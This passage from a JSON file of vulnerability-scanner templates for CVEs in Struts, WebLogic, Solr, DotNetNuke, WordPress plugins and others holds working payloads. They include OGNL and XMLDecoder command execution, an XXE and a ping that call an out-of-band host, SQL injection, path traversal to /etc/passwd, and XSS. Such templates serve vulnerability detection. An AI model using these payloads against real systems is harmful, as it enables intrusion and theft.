Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/integration/saveGangster.action"],"body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{result}}","added successfully"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7855","info":{"name":"IceWarp WebMail 11.3.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["lang=\"\"><img src=x onerror=alert(document.domain)>","IceWarp"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18638","info":{"name":"Graphite <=1.1.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-9822","info":{"name":"DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /__ HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nCookie: dnn_IsMobile=False; DNNPersonalization=<profile><item key=\"name1: key1\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type=\"xsd:string\">C:\\Windows\\win.ini</anyType></MethodParameters><ObjectInstance xsi:type=\"FileSystemUtils\"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]","for 16-bit app support"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2017-18501","info":{"name":"Social Login by BestWebSoft < 0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/social-login-bws/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Social Login by\")"],"condition":"and"}]}]},{"id":"CVE-2017-17043","info":{"name":"WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/emag-marketplace-connector/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3133","info":{"name":"Fortinet FortiOS < 5.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /logincheck HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain;charset=UTF-8\n\najax=1&username={{username}}&secretkey={{password}}\n","POST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRFTOKEN: {{csrf}}\nDNT: 1\n\ncsrfmiddlewaretoken={{csrf}}&buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%0A\n","GET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRFTOKEN: {{csrf}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["</textarea><script>alert(document.domain)</script>"]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"header","name":"csrf","group":2,"regex":["ccsrftoken_([0-9_a-z]+)=\"([A-Z0-9]+)\";"],"internal":true}]}]},{"id":"CVE-2017-17731","info":{"name":"DedeCMS 5.7 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14651","info":{"name":"WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Failed to add new collection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-15287","info":{"name":"Dreambox WebControl 2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"word","words":["Unknown command: <script>alert(document.cookie)</script>"]}]}]},{"id":"CVE-2017-18502","info":{"name":"Subscriber by BestWebSoft < 1.3.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/subscriber/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Subscriber by\")"],"condition":"and"}]}]},{"id":"CVE-2017-10271","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soapenv:Envelope\n    xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n    <soapenv:Header>\n        <work:WorkContext\n            xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n            <java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">\n                <void class=\"java.lang.ProcessBuilder\">\n                    <array class=\"java.lang.String\" length=\"3\">\n                        <void index=\"0\">\n                            <string>/bin/bash</string>\n                        </void>\n                        <void index=\"1\">\n                            <string>-c</string>\n                        </void>\n                        <void index=\"2\">\n                            <string>ping -c 1 {{interactsh-url}}</string>\n                        </void>\n                    </array>\n                    <void method=\"start\"/></void>\n            </java>\n        </work:WorkContext>\n    </soapenv:Header>\n    <soapenv:Body/>\n</soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n  <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n      <soapenv:Header>\n          <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n              <java>\n                  <void class=\"java.lang.Thread\" method=\"currentThread\">\n                      <void method=\"getCurrentWork\">\n                          <void method=\"getResponse\">\n                              <void method=\"getServletOutputStream\">\n                                  <void method=\"flush\"/>\n                              </void>\n                              <void method=\"getWriter\"><void method=\"write\"><string>{{randstr}}</string></void></void>\n                          </void>\n                      </void>\n                  </void>\n              </java>\n          </work:WorkContext>\n      </soapenv:Header>\n      <soapenv:Body/>\n</soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex(\"<faultstring>java.lang.ProcessBuilder || <faultstring>0\", body)","contains(interactsh_protocol, \"dns\")","status_code == 500"],"condition":"and"},{"type":"dsl","dsl":["body == \"{{randstr}}\"","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-12629","info":{"name":"Apache Solr <= 7.1 - XML Entity Injection","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2017-18562","info":{"name":"Error Log Viewer by BestWebSoft < 1.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/error-log-viewer/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Error Log Viewer by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-5638","info":{"name":"Apache Struts 2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd=\"cat /etc/passwd\",#cmds={\"/bin/bash\",\"-c\",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9416","info":{"name":"Odoo 8.0/9.0/10.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/base_import/static/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-12583","info":{"name":"DokuWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unable to parse at parameter \"<svg onload=alert(document.domain)>\".</div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-16806","info":{"name":"Ulterius Server < 1.9.5.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18492","info":{"name":"Contact Form to DB by BestWebSoft < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-to-db/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Contact Form to DB by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18496","info":{"name":"Htaccess by BestWebSoft < 1.7.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/htaccess/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Htaccess by\")"],"condition":"and"}]}]},{"id":"CVE-2017-5871","info":{"name":"Odoo <= 8.0-20160726 & 9.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/session/logout?redirect=https://oast.me","{{BaseURL}}/web/session/logout?redirect=https%3a%2f%2foast.me%2f","{{BaseURL}}/web/dbredirect?redirect=https%3a%2f%2foast.me%2f"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2017-15715","info":{"name":"Apache httpd <=2.4.29 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n\n{{randstr_1}}\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.php\\x0A\n------WebKitFormBoundaryKc8fBVDo558U4hbJ--\n","GET /{{randstr}}.php\\x0A HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip,deflate\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr_1}}\")"]}]}]},{"id":"CVE-2017-7269","info":{"name":"Windows Server 2003 & IIS 6.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"OPTIONS","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"<DAV:sql>\", dasl)","regex(\"[\\d]+(,\\s+[\\d]+)?\", dav)","regex(\".*?PROPFIND\", public)","regex(\".*?PROPFIND\", allow)"],"condition":"or"},{"type":"word","part":"header","words":["IIS/6.0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7925","info":{"name":"Dahua Security - Configuration File Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/passwd"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body), \"ugm\")","contains(to_lower(body), \"id:name:passwd\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["1:(.*:.*):1:CtrPanel"]}]}]},{"id":"CVE-2017-14537","info":{"name":"Trixbox 2.8.0 - Path Traversal","severity":"medium"},"requests":[{"raw":["POST /maint/index.php?packages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n\nxajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages\n","GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000486","info":{"name":"Primetek Primefaces 5.x - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\npfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D\n"],"matchers":[{"type":"word","part":"header","words":["Mogwailabs: CHECKCHECK"]}]}]},{"id":"CVE-2017-16877","info":{"name":"Nextjs <2.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7391","info":{"name":"Magmi 0.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18487","info":{"name":"AdPush < 1.44 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/adsense-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Google AdSense\")"],"condition":"and"}]}]},{"id":"CVE-2017-10075","info":{"name":"Oracle Content Server - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO","{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","ORACLE_QUERY"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2002-1131","info":{"name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search","{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search","{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0200","info":{"name":"Github Enterprise Authenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v3/user/orgs"],"headers":{"Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"extractors":[{"type":"json","part":"body","name":"org_name","internal":true,"json":[".[].login"]}]},{"method":"GET","path":["{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"],"headers":{"Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"matchers-condition":"and","matchers":[{"type":"word","words":["\"role\": \"admin\""],"part":"body"}]},{"method":"POST","path":["{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"],"headers":{"Content-Type":"application/json","Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"body":"{\n  \"name\": \"{{randstr}}\"\n}\n","matchers":[{"type":"status","status":[201]}]},{"method":"GET","cookie-reuse":true,"path":["{{BaseURL}}/login"],"extractors":[{"type":"regex","part":"body","internal":true,"group":1,"regex":["name=\"authenticity_token\" value=\"(.*?)\""],"name":"csrf_token"}]},{"method":"POST","path":["{{BaseURL}}/session"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&\n","matchers":[{"type":"status","status":[302]},{"type":"word","words":["_gh_render"],"part":"header"}]},{"method":"GET","path":["{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"],"extractors":[{"type":"regex","group":1,"name":"ghe_secret","internal":true,"regex":["&quot;ENTERPRISE_SESSION_SECRET&quot;=&gt;&quot;([^\"]+?)&quot;"],"part":"body"}],"matchers":[{"type":"word","words":["ENTERPRISE_SESSION_SECRET"],"part":"body"}]},{"method":"GET","path":["{{BaseURL}}/"],"headers":{"Cookie":"_gh_render={{final_payoad}}"},"matchers-condition":"and","matchers":[{"type":"status","status":[500]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-0881","info":{"name":"Combo Blocks < 2.2.76 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/user-meta/readme.txt"],"matchers":[{"type":"word","internal":true,"words":["User Profile Builder"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free","{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["{\"html\"","\"<div class=","\"pagination\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-21893","info":{"name":"Ivanti SAML - Server Side Request Forgery (SSRF)","severity":"high"},"requests":[{"raw":["POST /dana-ws/saml20.ws HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\t<soap:Body>\t\t<ds:Signature\t\txmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\t\t\t<ds:SignedInfo>\t\t\t\t<ds:CanonicalizationMethod Algorithm=\"http://www.w3.org/2001/10/xml-exc-c14n#\"/>\t\t\t\t<ds:SignatureMethod Algorithm=\"http://www.w3.org/2000/09/xmldsig#rsa-sha1\"/>\t\t\t</ds:SignedInfo>\t\t\t<ds:SignatureValue>qwerty</ds:SignatureValue>\t\t\t<ds:KeyInfo xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.w3.org/2000/09/xmldsig\" xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\t\t\t\t<ds:RetrievalMethod 